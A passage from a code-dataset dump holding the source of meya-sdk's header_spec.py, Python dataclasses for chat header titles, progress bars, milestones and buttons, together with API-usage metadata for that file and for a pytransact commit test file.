"line_number": 714, "usage_type": "call"}, {"api_name": "pytransact.commit.Commit", "line_number": 714, "usage_type": "attribute"}, {"api_name": "pytransact.commit", "line_number": 714, "usage_type": "name"}, {"api_name": "pytransact.mongo.find_one", "line_number": 724, "usage_type": "call"}, {"api_name": "pytransact.mongo", "line_number": 724, "usage_type": "name"}, {"api_name": "pytransact.commit", "line_number": 728, "usage_type": "name"}, {"api_name": "pytransact.mongo.find_one", "line_number": 728, "usage_type": "call"}, {"api_name": "pytransact.mongo", "line_number": 728, "usage_type": "name"}, {"api_name": "pytransact.commit", "line_number": 729, "usage_type": "name"}, {"api_name": "pytransact.commit", "line_number": 730, "usage_type": "name"}, {"api_name": "pytransact.commit", "line_number": 731, "usage_type": "name"}, {"api_name": "pytransact.commit", "line_number": 735, "usage_type": "name"}, {"api_name": "pytransact.mongo.find_one", "line_number": 735, "usage_type": "call"}, {"api_name": "pytransact.mongo", "line_number": 735, "usage_type": "name"}, {"api_name": "pytransact.commit", "line_number": 736, "usage_type": "name"}, {"api_name": "pytransact.commit", 
"line_number": 737, "usage_type": "name"}, {"api_name": "pytransact.commit", "line_number": 738, "usage_type": "name"}, {"api_name": "pytransact.commit", "line_number": 739, "usage_type": "name"}, {"api_name": "bson.objectid.ObjectId", "line_number": 742, "usage_type": "call"}, {"api_name": "pytransact.object.attribute.BlobVal", "line_number": 743, "usage_type": "call"}, {"api_name": "pytransact.object.attribute.BlobVal", "line_number": 744, "usage_type": "call"}, {"api_name": "pytransact.object.attribute.BlobVal", "line_number": 745, "usage_type": "call"}, {"api_name": "pytransact.commit.CallToi", "line_number": 750, "usage_type": "call"}, {"api_name": "pytransact.commit", "line_number": 750, "usage_type": "name"}, {"api_name": "bson.objectid.ObjectId", "line_number": 750, "usage_type": "call"}, {"api_name": "pytransact.mongo.find_one", "line_number": 754, "usage_type": "call"}, {"api_name": "pytransact.mongo", "line_number": 754, "usage_type": "name"}, {"api_name": "py.test.raises", "line_number": 756, "usage_type": "call"}, {"api_name": "py.test", "line_number": 756, "usage_type": "attribute"}, {"api_name": "gridfs.NoFile", "line_number": 756, "usage_type": "attribute"}, {"api_name": "py.test.raises", "line_number": 763, "usage_type": "call"}, {"api_name": "pymongo.errors.OperationFailure", "line_number": 763, "usage_type": "argument"}, {"api_name": "py.test", "line_number": 763, "usage_type": "attribute"}, {"api_name": "blm.testcommit.Test", "line_number": 768, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 768, "usage_type": "attribute"}, {"api_name": "pytransact.mongo.find_and_modify", "line_number": 769, "usage_type": "call"}, {"api_name": "pytransact.mongo", "line_number": 769, "usage_type": "name"}, {"api_name": "bson.objectid.ObjectId", "line_number": 770, "usage_type": "call"}, {"api_name": "blm.testcommit.Test._query", "line_number": 773, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 773, "usage_type": "attribute"}, {"api_name": "py.test.raises", "line_number": 775, "usage_type": "call"}, {"api_name": "py.test", "line_number": 775, "usage_type": "attribute"}, {"api_name": "pytransact.commit.ToisLocked", "line_number": 775, "usage_type": "attribute"}, {"api_name": "pytransact.commit", "line_number": 775, "usage_type": "name"}, {"api_name": "blm.testcommit.Test", "line_number": 779, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 779, "usage_type": "attribute"}, {"api_name": "pytransact.commit.CallToi", "line_number": 783, "usage_type": "call"}, {"api_name": "pytransact.commit", "line_number": 783, "usage_type": "name"}, {"api_name": "pytransact.contextbroker.ContextBroker", "line_number": 785, "usage_type": "call"}, {"api_name": "blm.testcommit.Test._query", "line_number": 800, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 800, "usage_type": "attribute"}, {"api_name": "py.test.skip", "line_number": 804, "usage_type": "call"}, {"api_name": "py.test", "line_number": 804, "usage_type": "attribute"}, {"api_name": "blm.testcommit.Test", "line_number": 809, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 809, "usage_type": "attribute"}, {"api_name": "pytransact.commit.CallToi", "line_number": 811, "usage_type": "call"}, {"api_name": "pytransact.commit", "line_number": 811, "usage_type": "name"}, {"api_name": "pytransact.mongo.find_and_modify", "line_number": 818, "usage_type": "call"}, {"api_name": "pytransact.mongo", "line_number": 818, "usage_type": "name"}, {"api_name": 
"blm.testcommit.Test._query", "line_number": 825, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 825, "usage_type": "attribute"}, {"api_name": "pytransact.commit", "line_number": 832, "usage_type": "name"}, {"api_name": "pytransact.commit", "line_number": 833, "usage_type": "name"}, {"api_name": "pytransact.commit", "line_number": 834, "usage_type": "name"}, {"api_name": "pytransact.commit._id", "line_number": 834, "usage_type": "attribute"}, {"api_name": "pytransact.commit", "line_number": 835, "usage_type": "name"}, {"api_name": "pytransact.commit", "line_number": 836, "usage_type": "name"}, {"api_name": "pytransact.commit", "line_number": 837, "usage_type": "name"}, {"api_name": "pytransact.commit.ToisLocked", "line_number": 843, "usage_type": "call"}, {"api_name": "pytransact.commit", "line_number": 843, "usage_type": "name"}, {"api_name": "py.test.raises", "line_number": 845, "usage_type": "call"}, {"api_name": "py.test", "line_number": 845, "usage_type": "attribute"}, {"api_name": "pytransact.commit.Timeout", "line_number": 845, "usage_type": "attribute"}, {"api_name": "pytransact.commit", "line_number": 845, "usage_type": "name"}, {"api_name": "pytransact.commit.CommitConflict", "line_number": 850, "usage_type": "call"}, {"api_name": "pytransact.commit", "line_number": 850, "usage_type": "name"}, {"api_name": "py.test.raises", "line_number": 852, "usage_type": "call"}, {"api_name": "py.test", "line_number": 852, "usage_type": "attribute"}, {"api_name": "pytransact.commit.Timeout", "line_number": 852, "usage_type": "attribute"}, {"api_name": "pytransact.commit", "line_number": 852, "usage_type": "name"}, {"api_name": "py.test.skip", "line_number": 855, "usage_type": "call"}, {"api_name": "py.test", "line_number": 855, "usage_type": "attribute"}, {"api_name": "bson.objectid.ObjectId", "line_number": 857, "usage_type": "call"}, {"api_name": "bson.objectid.ObjectId", "line_number": 858, "usage_type": "call"}, {"api_name": "bson.objectid.ObjectId", "line_number": 859, "usage_type": "call"}, {"api_name": "pytransact.mongo.insert", "line_number": 860, "usage_type": "call"}, {"api_name": "pytransact.mongo", "line_number": 860, "usage_type": "name"}, {"api_name": "pytransact.testsupport.Time", "line_number": 889, "usage_type": "call"}, {"api_name": "bson.objectid.ObjectId", "line_number": 896, "usage_type": "call"}, {"api_name": "bson.objectid.ObjectId", "line_number": 897, "usage_type": "call"}, {"api_name": "bson.objectid.ObjectId", "line_number": 898, "usage_type": "call"}, {"api_name": "pytransact.mongo.insert", "line_number": 900, "usage_type": "call"}, {"api_name": "pytransact.mongo", "line_number": 900, "usage_type": "name"}, {"api_name": "pytransact.mongo.insert", "line_number": 902, "usage_type": "call"}, {"api_name": "pytransact.mongo", "line_number": 902, "usage_type": "name"}, {"api_name": "pytransact.mongo.insert", "line_number": 904, "usage_type": "call"}, {"api_name": "pytransact.mongo", "line_number": 904, "usage_type": "name"}, {"api_name": "pytransact.difftoi.DiffTOI", "line_number": 908, "usage_type": "call"}, {"api_name": "pytransact.testsupport.Fake", "line_number": 910, "usage_type": "call"}, {"api_name": "bson.objectid.ObjectId", "line_number": 910, "usage_type": "call"}, {"api_name": "bson.objectid.ObjectId", "line_number": 911, "usage_type": "call"}, {"api_name": "pytransact.commit.Commit.fromdoc", "line_number": 912, "usage_type": "call"}, {"api_name": "pytransact.commit.Commit", "line_number": 912, "usage_type": "attribute"}, {"api_name": 
"pytransact.commit", "line_number": 912, "usage_type": "name"}, {"api_name": "pytransact.commit.Commit.fromdoc", "line_number": 917, "usage_type": "call"}, {"api_name": "pytransact.commit.Commit", "line_number": 917, "usage_type": "attribute"}, {"api_name": "pytransact.commit", "line_number": 917, "usage_type": "name"}, {"api_name": "blm.fundamental.AccessHolder", "line_number": 933, "usage_type": "call"}, {"api_name": "blm.fundamental", "line_number": 933, "usage_type": "attribute"}, {"api_name": "blm.fundamental.AccessHolder", "line_number": 934, "usage_type": "call"}, {"api_name": "blm.fundamental", "line_number": 934, "usage_type": "attribute"}, {"api_name": "blm.testcommit.Test", "line_number": 935, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 935, "usage_type": "attribute"}, {"api_name": "blm.testcommit.Test", "line_number": 936, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 936, "usage_type": "attribute"}, {"api_name": "blm.testcommit.Test", "line_number": 937, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 937, "usage_type": "attribute"}, {"api_name": "pytransact.mongo.insert", "line_number": 940, "usage_type": "call"}, {"api_name": "pytransact.mongo", "line_number": 940, "usage_type": "name"}, {"api_name": "pytransact.mongo.insert", "line_number": 943, "usage_type": "call"}, {"api_name": "pytransact.mongo", "line_number": 943, "usage_type": "name"}, {"api_name": "pytransact.mongo.insert", "line_number": 946, "usage_type": "call"}, {"api_name": "pytransact.mongo", "line_number": 946, "usage_type": "name"}, {"api_name": "bson.objectid.ObjectId", "line_number": 949, "usage_type": "call"}, {"api_name": "pytransact.mongo.insert", "line_number": 951, "usage_type": "call"}, {"api_name": "pytransact.mongo", "line_number": 951, "usage_type": "name"}, {"api_name": "bson.objectid.ObjectId", "line_number": 955, "usage_type": "call"}, {"api_name": "pytransact.commit.CommitContext", "line_number": 957, "usage_type": "attribute"}, {"api_name": "pytransact.commit", "line_number": 957, "usage_type": "name"}, {"api_name": "pytransact.difftoi.DiffTOI", "line_number": 960, "usage_type": "call"}, {"api_name": "bson.objectid.ObjectId", "line_number": 962, "usage_type": "call"}, {"api_name": "pytransact.commit.Commit.fromdoc", "line_number": 963, "usage_type": "call"}, {"api_name": "pytransact.commit.Commit", "line_number": 963, "usage_type": "attribute"}, {"api_name": "pytransact.commit", "line_number": 963, "usage_type": "name"}, {"api_name": "blm.testcommit.Test", "line_number": 986, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 986, "usage_type": "attribute"}, {"api_name": "blm.testcommit.Test._query", "line_number": 989, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 989, "usage_type": "attribute"}, {"api_name": "pytransact.commit.ChangeToi", "line_number": 990, "usage_type": "call"}, {"api_name": "pytransact.commit", "line_number": 990, "usage_type": "name"}, {"api_name": "blm.testcommit.Test", "line_number": 996, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 996, "usage_type": "attribute"}, {"api_name": "pytransact.commit.CommitContext", "line_number": 999, "usage_type": "call"}, {"api_name": "pytransact.commit", "line_number": 999, "usage_type": "name"}, {"api_name": "blm.testcommit.Test._query", "line_number": 1002, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 1002, "usage_type": "attribute"}, {"api_name": "pytransact.commit.ChangeToi", 
"line_number": 1003, "usage_type": "call"}, {"api_name": "pytransact.commit", "line_number": 1003, "usage_type": "name"}, {"api_name": "bson.objectid.ObjectId", "line_number": 1005, "usage_type": "call"}, {"api_name": "pytransact.commit.wait_for_commit", "line_number": 1013, "usage_type": "call"}, {"api_name": "pytransact.commit", "line_number": 1013, "usage_type": "name"}, {"api_name": "blm.testcommit.Test", "line_number": 1020, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 1020, "usage_type": "attribute"}, {"api_name": "blm.testcommit.Test._query", "line_number": 1023, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 1023, "usage_type": "attribute"}, {"api_name": "pytransact.commit.DeleteToi", "line_number": 1024, "usage_type": "call"}, {"api_name": "pytransact.commit", "line_number": 1024, "usage_type": "name"}, {"api_name": "blm.testcommit.Test", "line_number": 1030, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 1030, "usage_type": "attribute"}, {"api_name": "blm.testcommit.Test._query", "line_number": 1035, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 1035, "usage_type": "attribute"}, {"api_name": "pytransact.commit.DeleteToi", "line_number": 1036, "usage_type": "call"}, {"api_name": "pytransact.commit", "line_number": 1036, "usage_type": "name"}, {"api_name": "bson.objectid.ObjectId", "line_number": 1041, "usage_type": "call"}, {"api_name": "pytransact.commit.wait_for_commit", "line_number": 1044, "usage_type": "call"}, {"api_name": "pytransact.commit", "line_number": 1044, "usage_type": "name"}, {"api_name": "bson.objectid.ObjectId", "line_number": 1051, "usage_type": "call"}, {"api_name": "pytransact.commit.CreateToi", "line_number": 1052, "usage_type": "call"}, {"api_name": "pytransact.commit", "line_number": 1052, "usage_type": "name"}, {"api_name": "blm.testcommit.Test", "line_number": 1058, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 1058, "usage_type": "attribute"}, {"api_name": "pytransact.commit.CallToi", "line_number": 1062, "usage_type": "call"}, {"api_name": "pytransact.commit", "line_number": 1062, "usage_type": "name"}, {"api_name": "pytransact.commit.CallBlm", "line_number": 1071, "usage_type": "call"}, {"api_name": "pytransact.commit", "line_number": 1071, "usage_type": "name"}, {"api_name": "blm.fundamental.AccessHolder", "line_number": 1078, "usage_type": "call"}, {"api_name": "blm.fundamental", "line_number": 1078, "usage_type": "attribute"}, {"api_name": "blm.testcommit.Test", "line_number": 1079, "usage_type": "call"}, {"api_name": "blm.testcommit", "line_number": 1079, "usage_type": "attribute"}, {"api_name": "pytransact.commit.CallBlm", "line_number": 1084, "usage_type": "call"}, {"api_name": "pytransact.commit", "line_number": 1084, "usage_type": "name"}, {"api_name": "pytransact.commit.CallBlm", "line_number": 1090, "usage_type": "call"}, {"api_name": "pytransact.commit", "line_number": 1090, "usage_type": "name"}, {"api_name": "bson.objectid.ObjectId", "line_number": 1090, "usage_type": "call"}, {"api_name": "py.test.raises", "line_number": 1092, "usage_type": "call"}, {"api_name": "py.test", "line_number": 1092, "usage_type": "attribute"}, {"api_name": "pytransact.object.attribute.BlobVal", "line_number": 1095, "usage_type": "call"}, {"api_name": "pytransact.commit.CallToi", "line_number": 1096, "usage_type": "call"}, {"api_name": "pytransact.commit", "line_number": 1096, "usage_type": "name"}, {"api_name": "bson.objectid.ObjectId", 
"line_number": 1096, "usage_type": "call"}, {"api_name": "pytransact.commit.CallBlm", "line_number": 1099, "usage_type": "call"}, {"api_name": "pytransact.commit", "line_number": 1099, "usage_type": "name"}, {"api_name": "pytransact.commit.DeleteToi", "line_number": 1103, "usage_type": "call"}, {"api_name": "pytransact.commit", "line_number": 1103, "usage_type": "name"}, {"api_name": "bson.BSON.encode", "line_number": 1105, "usage_type": "call"}, {"api_name": "bson.BSON", "line_number": 1105, "usage_type": "attribute"}, {"api_name": "pytransact.commit.Commit", "line_number": 1111, "usage_type": "call"}, {"api_name": "pytransact.commit", "line_number": 1111, "usage_type": "name"}, {"api_name": "bson.objectid.ObjectId", "line_number": 1112, "usage_type": "argument"}, {"api_name": "pytransact.commit.Commit", "line_number": 1130, "usage_type": "call"}, {"api_name": "pytransact.commit", "line_number": 1130, "usage_type": "name"}, {"api_name": "pytransact.commit.Commit", "line_number": 1144, "usage_type": "call"}, {"api_name": "pytransact.commit", "line_number": 1144, "usage_type": "name"}, {"api_name": "pytransact.commit.Commit", "line_number": 1153, "usage_type": "call"}, {"api_name": "pytransact.commit", "line_number": 1153, "usage_type": "name"}, {"api_name": "pytransact.object.attribute.BlobVal", "line_number": 1158, "usage_type": "argument"}, {"api_name": "gridfs.GridOut", "line_number": 1159, "usage_type": "attribute"}, {"api_name": "pytransact.commit.Commit.fromdoc", "line_number": 1160, "usage_type": "call"}, {"api_name": "pytransact.commit.Commit", "line_number": 1160, "usage_type": "attribute"}, {"api_name": "pytransact.commit", "line_number": 1160, "usage_type": "name"}, {"api_name": "pytransact.commit.Commit", "line_number": 1171, "usage_type": "call"}, {"api_name": "pytransact.commit", "line_number": 1171, "usage_type": "name"}, {"api_name": "pytransact.object.attribute.BlobVal", "line_number": 1172, "usage_type": "call"}, {"api_name": "pytransact.object.attribute.BlobVal", "line_number": 1173, "usage_type": "call"}, {"api_name": "pytransact.object.attribute.BlobVal", "line_number": 1174, "usage_type": "call"}, {"api_name": "pytransact.object.attribute.BlobVal", "line_number": 1178, "usage_type": "call"}, {"api_name": "pytransact.commit.Commit", "line_number": 1200, "usage_type": "call"}, {"api_name": "pytransact.commit", "line_number": 1200, "usage_type": "name"}, {"api_name": "bson.objectid.ObjectId", "line_number": 1220, "usage_type": "call"}, {"api_name": "pytransact.commit.Commit", "line_number": 1221, "usage_type": "call"}, {"api_name": "pytransact.commit", "line_number": 1221, "usage_type": "name"}, {"api_name": "bson.objectid.ObjectId", "line_number": 1229, "usage_type": "call"}, {"api_name": "pytransact.commit.Commit", "line_number": 1230, "usage_type": "call"}, {"api_name": "pytransact.commit", "line_number": 1230, "usage_type": "name"}, {"api_name": "pytransact.commit.Commit", "line_number": 1236, "usage_type": "call"}, {"api_name": "pytransact.commit", "line_number": 1236, "usage_type": "name"}, {"api_name": "bson.objectid.ObjectId", "line_number": 1245, "usage_type": "call"}, {"api_name": "pytransact.commit.Commit", "line_number": 1246, "usage_type": "call"}, {"api_name": "pytransact.commit", "line_number": 1246, "usage_type": "name"}, {"api_name": "bson.objectid.ObjectId", "line_number": 1255, "usage_type": "call"}, {"api_name": "pytransact.commit.Commit", "line_number": 1256, "usage_type": "call"}, {"api_name": "pytransact.commit", "line_number": 1256, "usage_type": 
"name"}, {"api_name": "pytransact.commit.Commit.handle", "line_number": 1261, "usage_type": "call"}, {"api_name": "pytransact.commit.Commit", "line_number": 1261, "usage_type": "attribute"}, {"api_name": "pytransact.commit", "line_number": 1261, "usage_type": "name"}, {"api_name": "pytransact.commit.Commit.handle", "line_number": 1264, "usage_type": "call"}, {"api_name": "pytransact.commit.Commit", "line_number": 1264, "usage_type": "attribute"}, {"api_name": "pytransact.commit", "line_number": 1264, "usage_type": "name"}, {"api_name": "pytransact.commit.Commit", "line_number": 1268, "usage_type": "call"}, {"api_name": "pytransact.commit", "line_number": 1268, "usage_type": "name"}, {"api_name": "pytransact.object.attribute.BlobVal", "line_number": 1269, "usage_type": "call"}, {"api_name": "pytransact.commit.Commit", "line_number": 1286, "usage_type": "call"}, {"api_name": "pytransact.commit", "line_number": 1286, "usage_type": "name"}, {"api_name": "pytransact.object.attribute.BlobVal", "line_number": 1287, "usage_type": "call"}, {"api_name": "bson.objectid.ObjectId", "line_number": 1297, "usage_type": "call"}, {"api_name": "pytransact.commit.Commit.fromdoc", "line_number": 1298, "usage_type": "call"}, {"api_name": "pytransact.commit.Commit", "line_number": 1298, "usage_type": "attribute"}, {"api_name": "pytransact.commit", "line_number": 1298, "usage_type": "name"}, {"api_name": "bson.objectid.ObjectId", "line_number": 1304, "usage_type": "call"}, {"api_name": "pytransact.commit.Commit", "line_number": 1305, "usage_type": "call"}, {"api_name": "pytransact.commit", "line_number": 1305, "usage_type": "name"}, {"api_name": "pytransact.commit.Commit.fromquery", "line_number": 1308, "usage_type": "call"}, {"api_name": "pytransact.commit.Commit", "line_number": 1308, "usage_type": "attribute"}, {"api_name": "pytransact.commit", "line_number": 1308, "usage_type": "name"}]} +{"seq_id": "20375758981", "text": "from dataclasses import dataclass\nfrom dataclasses import field\nfrom meya.button.spec import ButtonElementSpecUnion\nfrom meya.button.spec import ButtonEventSpec\nfrom meya.icon.spec import IconElementSpecUnion\nfrom meya.icon.spec import IconEventSpec\nfrom meya.trigger.entry.activate import TriggerActivateEntry\nfrom numbers import Real\nfrom typing import List\nfrom typing import Optional\nfrom typing import Union\n\n\n@dataclass\nclass HeaderTitleCommonSpec:\n text: Optional[str] = field(default=None)\n\n\n@dataclass\nclass HeaderTitleElementSpec(HeaderTitleCommonSpec):\n icon: Optional[IconElementSpecUnion] = field(default=None)\n\n\nHeaderTitleElementSpecUnion = Union[HeaderTitleElementSpec, str, bool]\n\n\n@dataclass\nclass HeaderTitleEventSpec(HeaderTitleCommonSpec):\n icon: Optional[IconEventSpec] = field(default=None)\n\n @classmethod\n def from_element_spec_union(\n cls, title: HeaderTitleElementSpecUnion\n ) -> \"HeaderTitleEventSpec\":\n if isinstance(title, str):\n return HeaderTitleEventSpec(text=title)\n elif isinstance(title, HeaderTitleElementSpec):\n return HeaderTitleEventSpec(\n text=title.text,\n icon=IconEventSpec.from_element_spec(title.icon),\n )\n else:\n return HeaderTitleEventSpec()\n\n\n@dataclass\nclass HeaderProgressCommonSpec:\n value: Optional[Real] = field(default=None)\n show_percent: Optional[bool] = field(default=None)\n\n\n@dataclass\nclass HeaderProgressElementSpec(HeaderProgressCommonSpec):\n pass\n\n\nHeaderProgressElementSpecUnion = Union[HeaderProgressElementSpec, Real, bool]\n\n\n@dataclass\nclass 
HeaderProgressEventSpec(HeaderProgressCommonSpec):\n @classmethod\n def from_element_spec_union(\n cls, progress: HeaderProgressElementSpecUnion\n ) -> \"HeaderProgressEventSpec\":\n if isinstance(progress, Real):\n return HeaderProgressEventSpec(value=progress)\n elif isinstance(progress, HeaderProgressElementSpec):\n return HeaderProgressEventSpec(\n value=progress.value, show_percent=progress.show_percent\n )\n else:\n return HeaderProgressEventSpec()\n\n\n@dataclass\nclass HeaderMilestoneCommonSpec:\n text: Optional[str] = field(default=None)\n current: bool = field(default=False)\n\n\n@dataclass\nclass HeaderMilestoneElementSpec(HeaderMilestoneCommonSpec):\n pass\n\n\nHeaderMilestoneElementSpecUnion = Union[HeaderMilestoneElementSpec, str, bool]\n\n\n@dataclass\nclass HeaderMilestoneEventSpec(HeaderMilestoneCommonSpec):\n @classmethod\n def from_element_spec_union_list(\n cls, milestones: List[HeaderMilestoneElementSpecUnion]\n ) -> List[\"HeaderMilestoneEventSpec\"]:\n return [\n cls.from_element_spec_union(milestone) for milestone in milestones\n ]\n\n @classmethod\n def from_element_spec_union(\n cls, milestone: HeaderMilestoneElementSpecUnion\n ) -> \"HeaderMilestoneEventSpec\":\n if isinstance(milestone, str):\n return HeaderMilestoneEventSpec(text=milestone)\n elif isinstance(milestone, bool):\n return HeaderMilestoneEventSpec(current=milestone)\n else:\n return HeaderMilestoneEventSpec(\n text=milestone.text, current=milestone.current\n )\n\n\n@dataclass\nclass HeaderCommonSpec:\n pass\n\n\n@dataclass\nclass HeaderElementSpec(HeaderCommonSpec):\n buttons: Optional[List[ButtonElementSpecUnion]] = field(default=None)\n title: Optional[HeaderTitleElementSpecUnion] = field(default=None)\n progress: Optional[HeaderProgressElementSpecUnion] = field(default=None)\n milestones: Optional[List[HeaderMilestoneElementSpecUnion]] = field(\n default=None\n )\n extra_buttons: Optional[List[ButtonElementSpecUnion]] = field(default=None)\n\n\n@dataclass\nclass HeaderEventSpec(HeaderCommonSpec):\n buttons: Optional[List[ButtonEventSpec]] = field(default=None)\n title: Optional[HeaderTitleEventSpec] = field(default=None)\n progress: Optional[HeaderProgressEventSpec] = field(default=None)\n milestones: Optional[List[HeaderMilestoneEventSpec]] = field(default=None)\n extra_buttons: Optional[List[ButtonEventSpec]] = field(default=None)\n\n @classmethod\n def from_element_spec(\n cls, header: HeaderElementSpec, skip_triggers: bool = False\n ) -> (\"HeaderEventSpec\", List[TriggerActivateEntry]):\n buttons, button_triggers = (\n (None, [])\n if header.buttons is None\n else ButtonEventSpec.from_element_spec_union_list(\n header.buttons, skip_triggers=skip_triggers\n )\n )\n title = (\n None\n if header.title is None\n else HeaderTitleEventSpec.from_element_spec_union(header.title)\n )\n progress = (\n None\n if header.progress is None\n else HeaderProgressEventSpec.from_element_spec_union(\n header.progress\n )\n )\n milestones = (\n None\n if header.milestones is None\n else HeaderMilestoneEventSpec.from_element_spec_union_list(\n header.milestones\n )\n )\n extra_buttons, extra_button_triggers = (\n (None, [])\n if header.extra_buttons is None\n else ButtonEventSpec.from_element_spec_union_list(\n header.extra_buttons, skip_triggers=skip_triggers\n )\n )\n return (\n HeaderEventSpec(\n buttons=buttons,\n title=title,\n progress=progress,\n milestones=milestones,\n extra_buttons=extra_buttons,\n ),\n [*button_triggers, *extra_button_triggers],\n )\n\n def __or__(self, other: \"HeaderEventSpec\") -> 
\"HeaderEventSpec\":\n return HeaderEventSpec(\n buttons=self.buttons\n if self.buttons is not None\n else other.buttons,\n title=self.title if self.title is not None else other.title,\n progress=self.progress\n if self.progress is not None\n else other.progress,\n milestones=self.milestones\n if self.milestones is not None\n else other.milestones,\n extra_buttons=self.extra_buttons\n if self.extra_buttons is not None\n else other.extra_buttons,\n )\n", "repo_name": "meya-customers/meya-sdk", "sub_path": "meya/event/header_spec.py", "file_name": "header_spec.py", "file_ext": "py", "file_size_in_byte": 6413, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "typing.Optional", "line_number": 16, "usage_type": "name"}, {"api_name": "dataclasses.field", "line_number": 16, "usage_type": "call"}, {"api_name": "dataclasses.dataclass", "line_number": 14, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 21, "usage_type": "name"}, {"api_name": "meya.icon.spec.IconElementSpecUnion", "line_number": 21, "usage_type": "name"}, {"api_name": "dataclasses.field", "line_number": 21, "usage_type": "call"}, {"api_name": "dataclasses.dataclass", "line_number": 19, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 24, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 29, "usage_type": "name"}, {"api_name": "meya.icon.spec.IconEventSpec", "line_number": 29, "usage_type": "name"}, {"api_name": "dataclasses.field", "line_number": 29, "usage_type": "call"}, {"api_name": "meya.icon.spec.IconEventSpec.from_element_spec", "line_number": 40, "usage_type": "call"}, {"api_name": "meya.icon.spec.IconEventSpec", "line_number": 40, "usage_type": "name"}, {"api_name": "dataclasses.dataclass", "line_number": 27, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 48, "usage_type": "name"}, {"api_name": "numbers.Real", "line_number": 48, "usage_type": "name"}, {"api_name": "dataclasses.field", "line_number": 48, "usage_type": "call"}, {"api_name": "typing.Optional", "line_number": 49, "usage_type": "name"}, {"api_name": "dataclasses.field", "line_number": 49, "usage_type": "call"}, {"api_name": "dataclasses.dataclass", "line_number": 46, "usage_type": "name"}, {"api_name": "dataclasses.dataclass", "line_number": 52, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 57, "usage_type": "name"}, {"api_name": "numbers.Real", "line_number": 57, "usage_type": "name"}, {"api_name": "numbers.Real", "line_number": 66, "usage_type": "argument"}, {"api_name": "dataclasses.dataclass", "line_number": 60, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 78, "usage_type": "name"}, {"api_name": "dataclasses.field", "line_number": 78, "usage_type": "call"}, {"api_name": "dataclasses.field", "line_number": 79, "usage_type": "call"}, {"api_name": "dataclasses.dataclass", "line_number": 76, "usage_type": "name"}, {"api_name": "dataclasses.dataclass", "line_number": 82, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 87, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 94, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 95, "usage_type": "name"}, {"api_name": "dataclasses.dataclass", "line_number": 90, "usage_type": "name"}, {"api_name": "dataclasses.dataclass", "line_number": 114, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 121, "usage_type": "name"}, {"api_name": 
"typing.List", "line_number": 121, "usage_type": "name"}, {"api_name": "meya.button.spec.ButtonElementSpecUnion", "line_number": 121, "usage_type": "name"}, {"api_name": "dataclasses.field", "line_number": 121, "usage_type": "call"}, {"api_name": "typing.Optional", "line_number": 122, "usage_type": "name"}, {"api_name": "dataclasses.field", "line_number": 122, "usage_type": "call"}, {"api_name": "typing.Optional", "line_number": 123, "usage_type": "name"}, {"api_name": "dataclasses.field", "line_number": 123, "usage_type": "call"}, {"api_name": "typing.Optional", "line_number": 124, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 124, "usage_type": "name"}, {"api_name": "dataclasses.field", "line_number": 124, "usage_type": "call"}, {"api_name": "typing.Optional", "line_number": 127, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 127, "usage_type": "name"}, {"api_name": "meya.button.spec.ButtonElementSpecUnion", "line_number": 127, "usage_type": "name"}, {"api_name": "dataclasses.field", "line_number": 127, "usage_type": "call"}, {"api_name": "dataclasses.dataclass", "line_number": 119, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 132, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 132, "usage_type": "name"}, {"api_name": "meya.button.spec.ButtonEventSpec", "line_number": 132, "usage_type": "name"}, {"api_name": "dataclasses.field", "line_number": 132, "usage_type": "call"}, {"api_name": "typing.Optional", "line_number": 133, "usage_type": "name"}, {"api_name": "dataclasses.field", "line_number": 133, "usage_type": "call"}, {"api_name": "typing.Optional", "line_number": 134, "usage_type": "name"}, {"api_name": "dataclasses.field", "line_number": 134, "usage_type": "call"}, {"api_name": "typing.Optional", "line_number": 135, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 135, "usage_type": "name"}, {"api_name": "dataclasses.field", "line_number": 135, "usage_type": "call"}, {"api_name": "typing.Optional", "line_number": 136, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 136, "usage_type": "name"}, {"api_name": "meya.button.spec.ButtonEventSpec", "line_number": 136, "usage_type": "name"}, {"api_name": "dataclasses.field", "line_number": 136, "usage_type": "call"}, {"api_name": "meya.button.spec.ButtonEventSpec.from_element_spec_union_list", "line_number": 145, "usage_type": "call"}, {"api_name": "meya.button.spec.ButtonEventSpec", "line_number": 145, "usage_type": "name"}, {"api_name": "meya.button.spec.ButtonEventSpec.from_element_spec_union_list", "line_number": 171, "usage_type": "call"}, {"api_name": "meya.button.spec.ButtonEventSpec", "line_number": 171, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 141, "usage_type": "name"}, {"api_name": "meya.trigger.entry.activate.TriggerActivateEntry", "line_number": 141, "usage_type": "name"}, {"api_name": "dataclasses.dataclass", "line_number": 130, 